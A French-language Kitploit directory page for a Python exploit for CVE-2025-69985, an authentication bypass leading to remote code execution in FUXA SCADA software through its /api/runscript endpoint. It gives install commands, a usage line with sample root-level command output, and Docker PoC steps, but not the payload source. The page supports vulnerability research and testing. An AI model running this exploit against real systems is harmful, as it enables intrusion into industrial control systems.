Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69985 — Exploit Python pour CVE-2025-69985 ciblant le logiciel SCADA FUXA. Envoie une charge utile JSON spécialement conçue au point de terminaison /api/runscript pour contourner l'authentification et obtenir une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/joshuavanderpoll/cve-2025-69985
Analyse des VulnérabilitésExploitationSécurité SCADA/ICSExploitation d'Applications WebAuthentificationOutil d'Accès à Distance
GitHubjoshuavanderpoll/cve-2025-69985

CVE-2025-69985

Exploit Python pour CVE-2025-69985 ciblant le logiciel SCADA FUXA. Envoie une charge utile JSON spécialement conçue au point de terminaison /api/runscript pour contourner l'authentification et obtenir une exécution de code à distance.

Voir le dépôtSite web
25il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FUXA ≤ 1.2.8 Contournement d'authentification + RCE (CVE-2025-69985)

Python

📜 Description

Cet exploit Python cible CVE-2025-69985, une vulnérabilité critique de contournement d'authentification dans FUXA (logiciel SCADA/IHM web) versions ≤ 1.2.8. En envoyant une charge utile JSON spécialement conçue avec du code Node.js intégré au point de terminaison non protégé /api/runscript, il parvient à exécuter des commandes à distance en tant que processus FUXA — capturant la totalité de la sortie standard/erreur de manière synchrone dans la réponse.

🛠️ Installation

[!NOTE] Pour garantir un environnement propre et isolé pour les dépendances du projet, il est recommandé d'utiliser le module venv de Python.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Utilisation

root@kitploit:~
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami

 Target : http://localhost:1881
 Command: whoami

[*] Preparing payload → executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!

=== COMMAND OUTPUT ===
"root\n"
======================


======================================================================
 Exploit completed!.
======================================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:1881/

💻 Exemple

Exécuter le PoC

📢 Avertissement

Cet outil est fourni uniquement à des fins éducatives et de recherche. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par l'outil.

Télécharger l’outil